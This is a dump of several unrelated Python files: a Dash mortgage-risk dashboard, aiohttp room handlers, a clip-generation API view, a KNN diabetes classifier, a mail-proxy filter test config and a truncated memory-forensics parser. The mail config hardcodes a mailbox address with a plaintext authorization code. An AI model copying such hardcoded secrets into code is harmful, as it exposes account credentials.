href=\"https://dash.plot.ly/\"),\n ], style={'text-align': 'left'}),\n ]),\n html.Div(children=[\n html.Div(children=[\n html.Div(children=[\n html.H4([\n \"Selected Mortgages\",\n ], className=\"container_title\"),\n dcc.Loading(\n dcc.Graph(\n id='indicator-graph',\n figure=blank_fig(row_heights[0]),\n config={'displayModeBar': False},\n ),\n style={'height': row_heights[0]},\n ),\n html.Div(children=[\n html.Button(\n \"Clear All Selections\", id='clear-all', className='reset-button'\n ),\n ]),\n ], className='six columns pretty_container', id=\"indicator-div\"),\n html.Div(children=[\n html.H4([\n \"Configuration\",\n ], className=\"container_title\"),\n html.Table([\n html.Col(style={'width': '100px'}),\n html.Col(),\n html.Col(),\n html.Tr([\n html.Td(\n html.Div(\"GPU\"), className=\"config-label\"\n ),\n html.Td(daq.DarkThemeProvider(daq.BooleanSwitch(\n on=True,\n color='#00cc96',\n id='gpu-toggle',\n ))),\n html.Td(html.Button(\n \"Reset GPU\", id='reset-gpu', style={'width': '100%'}\n )),\n html.Div(id='reset-gpu-complete', style={'display': 'hidden'})\n ]),\n html.Tr([\n html.Td(html.Div(\"Color by\"), className=\"config-label\"),\n html.Td(dcc.Dropdown(\n id='aggregate-dropdown',\n options=[\n {'label': agg, 'value': agg}\n for agg in ['count', 'mean', 'min', 'max']\n ],\n value='count',\n searchable=False,\n clearable=False,\n )),\n html.Td(dcc.Dropdown(\n id='aggregate-col-dropdown',\n value='delinquency_12_prediction',\n searchable=False,\n clearable=False,\n )),\n ]),\n html.Tr([\n html.Td(html.Div(\"Colormap\"), className=\"config-label\"),\n html.Td(dcc.Dropdown(\n id='colorscale-dropdown',\n options=[\n {'label': cs, 'value': cs}\n for cs in ['Viridis', 'Cividis', 'Inferno', 'Magma', 'Plasma']\n ],\n value='Viridis',\n searchable=False,\n clearable=False,\n )),\n html.Td(dcc.Dropdown(\n id='colorscale-transform-dropdown',\n options=[{'label': t, 
'value': t}\n for t in ['linear', 'sqrt', 'cbrt', 'log']],\n value='linear',\n searchable=False,\n clearable=False,\n )),\n ]),\n html.Tr([\n html.Td(html.Div(\"Bin Count\"), className=\"config-label\"),\n html.Td(dcc.Slider(\n id='nbins-slider',\n min=10,\n max=40,\n step=5,\n value=20,\n marks={m: str(m) for m in range(10, 41, 5)},\n included=False,\n ), colSpan=2),\n ])\n ], style={'width': '100%', 'height': f'{row_heights[0] + 40}px'}),\n ], className='six columns pretty_container', id=\"config-div\"),\n ]),\n html.Div(children=[\n html.H4([\n \"Zip Codes\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='map-graph',\n figure=blank_fig(row_heights[1]),\n ),\n html.Button(\"Clear Selection\", id='reset-map', className='reset-button'),\n ], className='twelve columns pretty_container',\n style={\n 'width': '98%',\n 'margin-right': '0',\n },\n id=\"map-div\"\n ),\n html.Div(children=[\n html.Div(\n children=[\n html.H4([\n \"Risk Score\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='delinquency-histogram',\n config={'displayModeBar': False},\n figure=blank_fig(row_heights[2]),\n animate=True\n ),\n html.Button(\n \"Clear Selection\", id='clear-delinquency', className='reset-button'\n ),\n ],\n className='six columns pretty_container', id=\"delinquency-div\"\n ),\n html.Div(\n children=[\n html.H4([\n \"Borrower Credit Score\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='credit-histogram',\n config={'displayModeBar': False},\n figure=blank_fig(row_heights[2]),\n animate=True\n ),\n html.Button(\n \"Clear Selection\", id='clear-credit', className='reset-button'\n ),\n ],\n className='six columns pretty_container', id=\"credit-div\"\n ),\n ]),\n html.Div(children=[\n html.Div(\n children=[\n html.H4([\n \"Unpaid Balance\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='upb-histogram',\n figure=blank_fig(row_heights[2]),\n config={'displayModeBar': False},\n animate=True\n ),\n html.Button(\n \"Clear Selection\", id='clear-upb', className='reset-button'\n ),\n ],\n className='six columns pretty_container', id=\"upb-div\"\n ),\n html.Div(\n children=[\n html.H4([\n \"Debt to Income Ratio\",\n ], className=\"container_title\"),\n dcc.Graph(\n id='dti-histogram',\n figure=blank_fig(row_heights[2]),\n config={'displayModeBar': False},\n animate=True\n ),\n html.Button(\n \"Clear Selection\", id='clear-dti', className='reset-button'\n ),\n ],\n className='six columns pretty_container', id=\"dti-div\"\n ),\n ]),\n ]),\n html.Div(\n [\n html.H4('Acknowledgements', style={\"margin-top\": \"0\"}),\n dcc.Markdown('''\\\n - Dashboard written in Python using the [Dash](https://dash.plot.ly/) web framework.\n - GPU accelerated provided by the [cudf](https://github.com/rapidsai/cudf) and\n [cupy](https://cupy.chainer.org/) libraries.\n - Base map layer is the [\"dark\" map style](https://www.mapbox.com/maps/light-dark/)\n provided by [mapbox](https://www.mapbox.com/).\n'''),\n ],\n style={\n 'width': '98%',\n 'margin-right': '0',\n 'padding': '10px',\n },\n className='twelve columns pretty_container',\n ),\n])\n\n# Register callbacks\n@app.callback(\n [Output('aggregate-col-dropdown', 'options'),\n Output('aggregate-col-dropdown', 'disabled')],\n [Input('aggregate-dropdown', 'value')]\n)\ndef update_agg_col_dropdown(agg):\n if agg == 'count':\n options = [{'label': 'NA',\n 'value': 'NA'}]\n disabled = True\n else:\n options = [{'label': v, 'value': k} for k, v in column_labels.items()]\n disabled = False\n return options, disabled\n\n\n# Clear/reset button 
callbacks\n@app.callback(\n Output('map-graph', 'selectedData'),\n [Input('reset-map', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_map(*args):\n return None\n\n\n@app.callback(\n Output('dti-histogram', 'selectedData'),\n [Input('clear-dti', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_dti_hist_selections(*args):\n return None\n\n\n@app.callback(\n Output('credit-histogram', 'selectedData'),\n [Input('clear-credit', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_credit_hist_selections(*args):\n return None\n\n\n@app.callback(\n Output('upb-histogram', 'selectedData'),\n [Input('clear-upb', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_upb_hist_selection(*args):\n return None\n\n\n@app.callback(\n Output('delinquency-histogram', 'selectedData'),\n [Input('clear-delinquency', 'n_clicks'), Input('clear-all', 'n_clicks')]\n)\ndef clear_delinquency_hist_selection(*args):\n return None\n\n\n# Query string helpers\ndef bar_selection_to_query(selection, column, bounds, nbins):\n \"\"\"\n Compute pandas query expression string for selection callback data\n\n Args:\n selection: selectedData dictionary from Dash callback on a bar trace\n column: Name of the column that the selected bar chart is based on\n bounds: Dictionary from columns to (min, max) tuples\n nbins: Number of histogram bins\n\n Returns:\n String containing a query expression compatible with DataFrame.query. This\n expression will filter the input DataFrame to contain only those rows that\n are contained in the selection.\n \"\"\"\n point_inds = [p['pointIndex'] for p in selection['points']]\n bin_edges = np.linspace(*bounds[column], nbins)\n xmin = bin_edges[min(point_inds)]\n xmax = bin_edges[max(point_inds) + 1]\n xmin_op = \"<=\"\n xmax_op = \"<=\" if xmax == bin_edges[-1] else \"<\"\n return f\"{xmin} {xmin_op} {column} and {column} {xmax_op} {xmax}\"\n\n\ndef build_query(selections, exclude=None):\n \"\"\"\n Build pandas query expression string for cross-filtered plot\n\n Args:\n selections: Dictionary from column name to query expression\n exclude: If specified, column to exclude from combined expression\n\n Returns:\n String containing a query expression compatible with DataFrame.query.\n \"\"\"\n other_selected = {sel for c, sel in selections.items() if c != exclude}\n if other_selected:\n return ' and '.join(other_selected)\n else:\n return None\n\n\n# Plot functions\ndef build_colorscale(colorscale_name, transform):\n \"\"\"\n Build plotly colorscale\n\n Args:\n colorscale_name: Name of a colorscale from the plotly.colors.sequential module\n transform: Transform to apply to colors scale. One of 'linear', 'sqrt', 'cbrt',\n or 'log'\n\n Returns:\n Plotly color scale list\n \"\"\"\n colors = getattr(sequential, colorscale_name)\n if transform == \"linear\":\n scale_values = np.linspace(0, 1, len(colors))\n elif transform == \"sqrt\":\n scale_values = np.linspace(0, 1, len(colors)) ** 2\n elif transform == \"cbrt\":\n scale_values = np.linspace(0, 1, len(colors)) ** 3\n elif transform == \"log\":\n scale_values = (10 ** np.linspace(0, 1, len(colors)) - 1) / 9\n else:\n raise ValueError(\"Unexpected colorscale transform\")\n return [(v, clr) for v, clr in zip(scale_values, colors)]\n\n\ndef build_choropleth(\n df, aggregate, aggregate_column, colorscale_name, colorscale_transform, selected_zips\n):\n \"\"\"\n Build choropleth figure\n\n Args:\n df: pandas or cudf DataFrame\n aggregate: Aggregate operation (count, mean, etc.)\n aggregate_column: Column to perform aggregate on. 
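# --- Worked example (invented bounds) of the bin-edge arithmetic in
# bar_selection_to_query(): with bounds (0, 100) and nbins=21, np.linspace
# yields 21 edges (20 bins of width 5), and selecting bars 3..4 maps to the
# half-open interval [15, 25).
import numpy as np

bounds = {'dti': (0, 100)}
edges = np.linspace(*bounds['dti'], 21)
xmin, xmax = edges[3], edges[4 + 1]
assert (xmin, xmax) == (15.0, 25.0)
# resulting query string: "15.0 <= dti and dti < 25.0"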
Ignored for 'count' aggregate\n colorscale_name: Name of plotly colorscale\n colorscale_transform: Colorscale transformation\n clear_selection: If true, clear choropleth selection. Otherwise leave\n selection unchanged\n\n Returns:\n Choropleth figure dictionary\n \"\"\"\n # Perform aggregation\n if aggregate == \"count\":\n zip_aggregates = df.groupby('zip').zip.count()\n else:\n grouper = df.groupby('zip')[aggregate_column]\n zip_aggregates = getattr(grouper, aggregate)()\n\n if isinstance(df, cudf.DataFrame):\n zip_aggregates = zip_aggregates.to_pandas()\n\n # Filter down to zip codes that we have geojson for\n zip_aggregates = zip_aggregates[zip_aggregates.index.isin(valid_zip3s)]\n\n # Build zero-padded zip3 strings\n zip_strs = zip_aggregates.index.astype(str).str.zfill(3)\n\n # Build colorscale\n colorscale = build_colorscale(colorscale_name, colorscale_transform)\n\n # Compute selected points\n if selected_zips is None:\n selectedpoints = None\n else:\n selected_mask = zip_aggregates.index.isin(selected_zips)\n selectedpoints = np.nonzero(selected_mask)[0]\n\n if aggregate == \"count\":\n colorbar_title = aggregate\n else:\n column_label = column_labels[aggregate_column]\n colorbar_title = f\"{aggregate}({column_label})\"\n\n # Build Figure\n fig = {\n \"data\": [{\n \"type\": \"choroplethmapbox\",\n \"geojson\": zip3_url,\n \"featureidkey\": \"properties.ZIP3\",\n \"locations\": zip_strs,\n \"z\": zip_aggregates.values,\n \"colorscale\": colorscale,\n \"selectedpoints\": selectedpoints,\n \"colorbar\": {\"title\": {\n \"text\": colorbar_title, \"side\": \"right\", \"font\": {\"size\": 14}\n }}\n }],\n \"layout\": {\n \"mapbox\": {\n \"style\": \"dark\",\n \"accesstoken\": token,\n \"zoom\": 3,\n \"center\": {\"lat\": 37.0902, \"lon\": -95.7129},\n 'pitch': 0,\n 'bearing': 0,\n },\n \"uirevision\": True,\n \"margin\": {\"r\": 140, \"t\": 26, \"l\": 0, \"b\": 0},\n 'template': template,\n }\n }\n\n return fig\n\n\ndef build_histogram(df, column, nbins, bounds, selections, query_cache):\n \"\"\"\n Build histogram figure\n\n Args:\n df: pandas or cudf DataFrame\n column: Column name to build histogram from\n nbins: Number of histogram bins\n bounds: Dictionary from columns to (min, max) tuples\n selections: Dictionary from column names to query expressions\n query_cache: Dict from query expression to filtered DataFrames\n\n Returns:\n Histogram figure dictionary\n \"\"\"\n query = build_query(selections, column)\n if query in query_cache:\n df = query_cache[query]\n elif query:\n df = df.query(query)\n query_cache[query] = df\n\n if isinstance(df, cudf.DataFrame):\n bin_edges = cupy.linspace(*bounds[column], nbins)\n counts = cupy.asnumpy(cupy.histogram(df[column], bin_edges)[0])\n bin_edges = cupy.asnumpy(bin_edges)\n else:\n bin_edges = np.linspace(*bounds[column], nbins)\n counts = np.histogram(df[column], bin_edges)[0]\n\n centers = (bin_edges[:-1] + bin_edges[1:]) / 2.0\n fig = {\n 'data': [{\n 'type': 'bar', 'x': centers, 'y': counts,\n 'marker': {'color': text_color}\n }],\n 'layout': {\n 'yaxis': {\n 'type': 'log',\n # 'range': [0, None],\n 'range': [0, 8], # Up to 100M\n 'title': {\n 'text': \"Count\"\n }\n },\n 'selectdirection': 'h',\n 'dragmode': 'select',\n 'template': template,\n 'uirevision': True,\n }\n }\n if column not in selections:\n fig['data'][0]['selectedpoints'] = False\n\n return fig\n\n\ndef build_updated_figures(\n df, selected_map, selected_dti, selected_credit, selected_upb,\n selected_delinquency, aggregate, aggregate_column,\n colorscale_name, 
colorscale_transform, nbins, bounds\n):\n    """\n    Build all figures for dashboard\n\n    Args:\n        df: pandas or cudf DataFrame\n        selected_map: selectedData for choropleth figure\n        selected_dti: selectedData for dti histogram\n        selected_credit: selectedData for credit history histogram\n        selected_upb: selectedData for unpaid balance histogram\n        selected_delinquency: selectedData for delinquency histogram\n        aggregate: Aggregate operation for choropleth (count, mean, etc.)\n        aggregate_column: Aggregate column for choropleth\n        colorscale_name: Colorscale name from plotly.colors.sequential\n        colorscale_transform: Colorscale transformation ('linear', 'sqrt', 'cbrt', 'log')\n        nbins: Number of histogram bins\n        bounds: Dictionary from columns to (min, max) tuples\n\n    Returns:\n        tuple of figures in the following order\n        (choropleth, credit_histogram, delinquency_histogram,\n        dti_histogram, n_selected_indicator, upb_histogram)\n    """\n    selected = {\n        col: bar_selection_to_query(sel, col, bounds, nbins)\n        for col, sel in zip([\n            'dti', 'borrower_credit_score',\n            'current_actual_upb', 'delinquency_12_prediction'\n        ], [\n            selected_dti, selected_credit, selected_upb, selected_delinquency\n        ]) if sel and sel.get('points', [])\n    }\n\n    array_module = cupy if isinstance(df, cudf.DataFrame) else np\n\n    all_hists_query = build_query(selected)\n\n    if selected_map:\n        selected_zips = array_module.array(\n            [int(p['location']) for p in selected_map['points']])\n    else:\n        selected_zips = None\n\n    if selected_zips is not None:\n        zips_array = array_module.asarray(df['zip'])\n\n        # Perform isin in fixed length chunks to limit memory usage\n        isin_mask = array_module.zeros(len(zips_array), dtype=bool)\n        stride = 32\n        for i in range(0, len(selected_zips), stride):\n            zips_chunk = selected_zips[i:i+stride]\n            isin_mask |= array_module.isin(zips_array, zips_chunk)\n        df_map = df[isin_mask]\n    else:\n        df_map = df\n\n    choropleth = build_choropleth(\n        df.query(all_hists_query) if all_hists_query else df, aggregate,\n        aggregate_column, colorscale_name, colorscale_transform, selected_zips)\n\n    # Build indicator figure\n    n_selected_indicator = {\n        'data': [{\n            'type': 'indicator',\n            'value': len(\n                df_map.query(all_hists_query) if all_hists_query else df_map\n            ),\n            'number': {\n                'font': {\n                    'color': text_color\n                }\n            }\n        }],\n        'layout': {\n            'template': template,\n            'height': row_heights[0],\n            'margin': {'l': 10, 'r': 10, 't': 10, 'b': 10}\n        }\n    }\n    query_cache = {}\n    delinquency_histogram = build_histogram(\n        df_map, 'delinquency_12_prediction', nbins, bounds, selected, query_cache,\n    )\n\n    credit_histogram = build_histogram(\n        df_map, 'borrower_credit_score', nbins, bounds, selected, query_cache\n    )\n\n    upb_histogram = build_histogram(\n        df_map, 'current_actual_upb', nbins, bounds, selected, query_cache\n    )\n\n    dti_histogram = build_histogram(\n        df_map, 'dti', nbins, bounds, selected, query_cache\n    )\n\n    return (choropleth, credit_histogram, delinquency_histogram,\n            dti_histogram, n_selected_indicator, upb_histogram)\n\n\ndef register_update_plots_callback(client, bounds):\n    """\n    Register Dash callback that updates all plots in response to selection events\n    Args:\n        client: Dask distributed client used to fetch the published datasets\n        bounds: Dictionary from columns to (min, max) tuples\n    """\n    @app.callback(\n        [Output('indicator-graph', 'figure'), Output('map-graph', 'figure'),\n         Output('dti-histogram', 'figure'), Output('credit-histogram', 'figure'),\n         Output('upb-histogram', 'figure'), Output('delinquency-histogram', 'figure')],\n        
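# NOTE: the order of these Outputs must match the order of the tuple\n        # returned by update_plots below.\n        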
[Input('map-graph', 'selectedData'),\n Input('dti-histogram', 'selectedData'), Input('credit-histogram', 'selectedData'),\n Input('upb-histogram', 'selectedData'), Input('delinquency-histogram', 'selectedData'),\n Input('aggregate-dropdown', 'value'), Input('aggregate-col-dropdown', 'value'),\n Input('colorscale-dropdown', 'value'), Input('colorscale-transform-dropdown', 'value'),\n Input('nbins-slider', 'value'), Input('gpu-toggle', 'on')\n ]\n )\n def update_plots(\n selected_map, selected_dti, selected_credit, selected_upb, selected_delinquency,\n aggregate, aggregate_column, colorscale_name, transform, nbins, gpu_enabled\n ):\n t0 = time.time()\n\n # Get delayed dataset from client\n if gpu_enabled:\n df_d = client.get_dataset('c_df_d')\n else:\n df_d = client.get_dataset('pd_df_d')\n\n figures_d = delayed(build_updated_figures)(\n df_d, selected_map, selected_dti, selected_credit, selected_upb,\n selected_delinquency, aggregate, aggregate_column, colorscale_name,\n transform, nbins, bounds)\n\n figures = figures_d.compute()\n\n (choropleth, credit_histogram, delinquency_histogram,\n dti_histogram, n_selected_indicator, upb_histogram) = figures\n\n print(f\"Update time: {time.time() - t0}\")\n return (\n n_selected_indicator, choropleth, dti_histogram, credit_histogram,\n upb_histogram, delinquency_histogram\n )\n\n\ndef publish_dataset_to_cluster():\n # Look for dataset\n dataset_url = 'https://s3.us-east-2.amazonaws.com/rapidsai-data/viz-data/146M_predictions_v2.arrow.gz'\n\n data_path = \"./data/146M_predictions_v2.arrow\"\n if not os.path.exists(data_path):\n print(f\"Mortgage dataset not found at ./data/146M_predictions_v2.arrow.\\n\"\n f\"Downloading from {dataset_url}\")\n # Download dataset to data directory\n os.makedirs('./data', exist_ok=True)\n data_gz_path = data_path + '.gz'\n with requests.get(dataset_url, stream=True) as r:\n r.raise_for_status()\n with open(data_gz_path, 'wb') as f:\n for chunk in r.iter_content(chunk_size=8192):\n if chunk:\n f.write(chunk)\n\n print(\"Decompressing...\")\n with gzip.open(data_gz_path, 'rb') as f_in:\n with open(data_path, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n\n print(\"Deleting compressed file...\")\n os.remove(data_gz_path)\n\n print('done!')\n else:\n print(f\"Found dataset at {data_path}\")\n\n # Note: The creation of a Dask LocalCluster must happen inside the `__main__` block,\n cluster = LocalCUDACluster(CUDA_VISIBLE_DEVICES=\"0\")\n client = Client(cluster)\n print(f\"Dask status: {cluster.dashboard_link}\")\n\n # Load dataset and persist dataset on cluster\n def load_and_publish_dataset():\n # pandas DataFrame\n pd_df_d = delayed(load_dataset)(data_path).persist()\n\n # cudf DataFrame\n c_df_d = delayed(cudf.DataFrame.from_pandas)(pd_df_d).persist()\n\n # Unpublish datasets if present\n for ds_name in ['pd_df_d', 'c_df_d']:\n if ds_name in client.datasets:\n client.unpublish_dataset(ds_name)\n\n # Publish datasets to the cluster\n client.publish_dataset(pd_df_d=pd_df_d)\n client.publish_dataset(c_df_d=c_df_d)\n\n load_and_publish_dataset()\n\n # Precompute field bounds\n c_df_d = client.get_dataset('c_df_d')\n bounds = delayed(compute_bounds)(c_df_d, float_columns).compute()\n\n # Define callback to restart cluster and reload datasets\n @app.callback(\n Output('reset-gpu-complete', 'children'),\n [Input('reset-gpu', 'n_clicks')]\n )\n def restart_cluster(n_clicks):\n if n_clicks:\n print(\"Restarting LocalCUDACluster\")\n client.unpublish_dataset('pd_df_d')\n client.unpublish_dataset('c_df_d')\n 
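# NOTE: restart() clears all worker memory, so the datasets unpublished\n            # above are rebuilt and re-published by load_and_publish_dataset() below.\n            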
client.restart()\n            load_and_publish_dataset()\n\n    # Register top-level callback that updates plots\n    register_update_plots_callback(client, bounds)\n\n\ndef server():\n    # gunicorn entry point when called with `gunicorn 'app:server()'`\n    publish_dataset_to_cluster()\n    return app.server\n\n\nif __name__ == '__main__':\n    # development entry point\n    publish_dataset_to_cluster()\n\n    # Launch dashboard\n    app.run_server(debug=False, dev_tools_silence_routes_logging=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":29101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"253952528","text":"from aiohttp import web\n\nimport db\nfrom utils import get_admin_logins, is_admin\n\nasync def create_room(request):\n    data = await request.json()\n    assert 'theme' in data\n    assert 'name' in data\n    if not is_admin(data):\n        return web.json_response({\n            'status': 'Access denied',\n        }, status=403)\n    res = await db.create_room(request.app['db_pool'], data)\n    return web.json_response({\n        'status': 'Successfully created',\n        'room_id': res['id']\n    })\n\nasync def rooms(request):\n    data = await db.get_rooms(request.app['db_pool'])\n    return web.json_response(data)\n\nasync def room_ud(request):\n    id = int(request.match_info['id'])\n    data = await request.json()\n    status = 'Unknown'\n    if not is_admin(data):\n        return web.json_response({\n            'status': 'Access denied',\n        }, status=403)\n    if request.method == 'DELETE':\n        await db.delete_room(request.app['db_pool'], {'id': id})\n        status = 'Successfully deleted'\n    if request.method == 'PATCH':\n        assert 'theme' in data\n        assert 'name' in data\n        data['id'] = id\n        await db.update_room(request.app['db_pool'], data)\n        status = 'Successfully updated'\n    return web.json_response({'status': status})\n\nasync def admins(request):\n    return web.json_response(get_admin_logins())\n\n\ndef add_routers(app):\n    app.router.add_get('/admins', admins)\n    app.router.add_post('/room', create_room)\n    app.router.add_get('/room', rooms)\n    app.router.add_route('patch', '/room/{id}', room_ud)\n    app.router.add_route('delete', '/room/{id}', room_ud)\n    app.router.add_static('/static', './static')\n","sub_path":"room_handlers.py","file_name":"room_handlers.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313818771","text":"import tempfile\nimport traceback\nimport hashlib\n\nfrom ..models import TemporaryFile\nfrom ..models import Media\nfrom ..serializers import TemporaryFileSerializer\nfrom ..schema import GetClipSchema\n\nfrom ._base_views import BaseDetailView\nfrom ._media_util import MediaUtil\nfrom ._permissions import ProjectViewOnlyPermission\n\nclass GetClipAPI(BaseDetailView):\n    schema = GetClipSchema()\n    permission_classes = [ProjectViewOnlyPermission]\n    http_method_names = ['get']\n\n    def get_serializer(self):\n        \"\"\" This allows the AutoSchema to fill in the response details nicely\"\"\"\n        return TemporaryFileSerializer()\n\n    def get_queryset(self):\n        return Media.objects.all()\n\n    def _get(self, params):\n        \"\"\" Facility to get a clip from the server. 
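Each entry of params['frameRanges'] should be a 'start:end' string, e.g. ['0:30', '120:150'] (illustrative values). 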
Returns a temporary file object that expires in 24 hours.\n \"\"\"\n # upon success we can return an image\n video = Media.objects.get(pk=params['id'])\n project = video.project\n frameRangesStr = params.get('frameRanges', None)\n frameRangesTuple=[frameRange.split(':') for frameRange in frameRangesStr]\n frameRanges=[]\n for t in frameRangesTuple:\n frameRanges.append((int(t[0]), int(t[1])))\n\n quality = params.get('quality', None)\n h = hashlib.new('md5', f\"{params}\".encode())\n lookup = h.hexdigest()\n\n # Check to see if we already made this clip\n matches=TemporaryFile.objects.filter(project=project, lookup=lookup)\n if matches.exists():\n temp_file = matches[0]\n else:\n with tempfile.TemporaryDirectory() as temp_dir:\n media_util = MediaUtil(video, temp_dir, quality)\n fp = media_util.getClip(frameRanges)\n\n temp_file = TemporaryFile.from_local(fp, \"clip.mp4\", project, self.request.user, lookup=lookup, hours=24)\n\n responseData = TemporaryFileSerializer(temp_file, context={\"view\": self}).data\n return responseData\n","sub_path":"main/rest/get_clip.py","file_name":"get_clip.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535094352","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom matplotlib import pyplot as plt\n\n#load dataset\ndataframe = pd.read_csv(\"../test-datasets/classification/pima-indians-diabetes.data.csv\",sep=\",\")\n\n#dataframe shuffling\ndataframe = dataframe.reindex(np.random.permutation(dataframe.index))\n\n#training set, test set splitting\ntrain_set = dataframe.sample(frac=0.8, random_state=200)\ntest_set = dataframe.drop(train_set.index)\n\n#training set features and target\nX_train = train_set[[\"no: of pregnancy\",\"plasma glucose concentration\",\"diastolic blood pressure(mmHg)\",\n\"triceps skin fold thickness(mm)\",\"2hr serum insulin (mu U/ml)\",\"BMI\",\"diabetes pedigree\",\"age\"]]\ny_train = train_set[[\"diabetic\"]]\n\n#test set features and target\nX_test = test_set[[\"no: of pregnancy\",\"plasma glucose concentration\",\"diastolic blood pressure(mmHg)\",\n\"triceps skin fold thickness(mm)\",\"2hr serum insulin (mu U/ml)\",\"BMI\",\"diabetes pedigree\",\"age\"]]\ny_test = test_set[[\"diabetic\"]]\n\n#inspect dataframe\nprint(dataframe.describe())\n\n#train the model with K-Nearest Neighbor algorithm with max neighbor 'n_neighbor'\ntraining_accuracy = []\ntest_accuracy = []\nneighbors_settings = range(1,5)\nfor n_neighbor in neighbors_settings:\n\tknn = KNeighborsClassifier(n_neighbors=n_neighbor)\n\tknn.fit(X_train, y_train)\n\ttraining_accuracy.append(knn.score(X_train, y_train))\n\ttest_accuracy.append(knn.score(X_test, y_test))\n\n#make predictions on the test set \nprediction = knn.predict(X_test)\n\n#determine the accuracy\nprint(\"Training set accuracy : \", training_accuracy)\nprint(\"Test set accuracy : \", test_accuracy)\nplt.plot(neighbors_settings, training_accuracy, color=\"blue\", label=\"training accuracy\")\nplt.plot(neighbors_settings, test_accuracy, color=\"red\", label=\"test accuracy\")\nplt.xlabel(\"No: of neighbors\")\nplt.ylabel(\"Accuracy\")\nplt.legend()\nplt.show()","sub_path":"knn/knn-cls-diabetes.py","file_name":"knn-cls-diabetes.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"299806867","text":"#coding:utf-8\nfrom common import baseinfo\n\nproxy_ip = 
baseinfo.BG8010FrontOpeIp\nmail_attach = baseinfo.mail_attach\n\n# SMTP parameter settings\nmail_sender = baseinfo.mail_sender # sender\nmail_receivers = baseinfo.mail_receivers # recipients\nmail_cc = baseinfo.mail_cc # CC recipients\nmail_bcc = baseinfo.mail_bcc # BCC recipients\nmail_host = proxy_ip # mail server (the sender's server proxy)\nmail_port = baseinfo.mail_proxy_port # server port\nmail_user = baseinfo.mail_user # mail login address\nmail_pass = baseinfo.mail_pass # authorization code\ndeny_mail = 'jusontest@163.com'\ndeny_pwd = 'UMXDELUQAPUWQFNU'\n\n# POP3 parameter settings\n# mailbox password and matching POP3 server; the mail address is the same as the recipient's\npop3_email = baseinfo.pop3_email\npop3_pwd = baseinfo.pop3_pwd # authorization code\npop3_server_host = proxy_ip\npop3_server_port = baseinfo.pop3_server_port\n\ndeny_title = 'test'\ntitle = '我不是黑名单主题,测试多种类型(隔离的数据结构检查)' # kept verbatim; means "not a blacklisted subject, testing multiple types (quarantine data structure check)"\ndeny_filename = 'test'\ndeny_extend = 'txt'\nfilename = '1'\nextend = 'xls'\ndeny_name_file = deny_filename + '.' + extend\ndeny_extend_file = filename + '.' + deny_extend\nfile = filename + '.' + extend\nattach_file = mail_attach + deny_name_file\nattach_extend = mail_attach + deny_extend_file\nattach_path = mail_attach + file\ncontext = '测试测试测试' # kept verbatim; means "test test test"\n\nmail_ip = proxy_ip + ':' + str(mail_port)\npop3_ip = proxy_ip + ':' + str(pop3_server_port)\n# configuration checks\n# each list holds, in order: query command, expected result\ncase1_step1={\n\"step1\":[\"cat /etc/jsac/customapp.stream\",mail_ip],\n\"step2\":[\"cat /etc/jsac/customapp.stream\",pop3_ip]\n}\ncase1_step11={\n\"step1\":[\"netstat -anp |grep tcp\",mail_ip],\n\"step2\":[\"netstat -anp |grep tcp\",pop3_ip]\n}\ncase1_step2={\n\"step1\":[\"cat /etc/jsac/filter.json\",\"allow-from\"],\n\"step2\":[\"cat /etc/jsac/filter.json\",mail_sender],\n\"step3\":[\"cat /etc/jsac/filter.json\",mail_receivers[0]],\n\"step4\":[\"cat /etc/jsac/filter.json\",\"deny-topic\"],\n\"step5\":[\"cat /etc/jsac/filter.json\",deny_title],\n\"step6\":[\"cat /etc/jsac/filter.json\",\"deny-basename\"],\n\"step7\":[\"cat /etc/jsac/filter.json\",deny_filename],\n\"step8\":[\"cat /etc/jsac/filter.json\",\"deny-suffix\"],\n\"step9\":[\"cat /etc/jsac/filter.json\",deny_extend]\n}\n\ndelcheck = {\n    \"step1\": [\"cat /etc/jsac/filter.json\", \"mail\"]\n}","sub_path":"Case_rbm/iso_mail_check_alltype/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116606035","text":"# Expects Python 3.x (tested on 3.6.4)\r\n\r\n# imports here (if any)\r\nimport re\r\nimport struct\r\nimport sys\r\n\r\n# uncomment next two lines for debugging\r\n#import pdb\r\n#pdb.set_trace()\r\n\r\ndef getEprocess(fd):\r\n    ''' Parses EPROCESS blocks\r\n        Arguments: open file descriptor\r\n        Returns: nothing\r\n        \r\n    '''\r\n    # find EPROCESS headers\r\n    E_P_HEADER = b'\\x03\\x00\\x1B\\x00\\x00\\x00\\x00\\x00'\r\n    print(\"PROCESS PIDs and PPIDs\\n\")\r\n    for match in re.finditer(E_P_HEADER, fd.read()):\r\n        fd.seek(match.start()) # moves file pointer to start of E_block\r\n        try:\r\n            # Move to offset 132 and use struct.unpack to read two bytes at PID offset as variable pid\r\n            fd.seek(131, 1)\r\n            pid = struct.unpack('<H', fd.read(2))[0]\r\n        except struct.error as err: # break out of the loop if the struct read fails\r\n            break\r\n        print('PID: ' + str(pid))\r\n\r\n        # Dump PPID at offset + 332\r\n        fd.seek(match.start())\r\n        try:\r\n            # Move to offset 332 and use struct.unpack to read two bytes at PPID offset as variable ppid\r\n            fd.seek(331, 1)\r\n            ppid = struct.unpack('<H', fd.read(2))[0]\r\n        except struct.error as err: # break out of the loop if the struct read fails.\r\n            break\r\n        print('PPID: '+str(ppid)+'\\n')\r\n\r\ndef 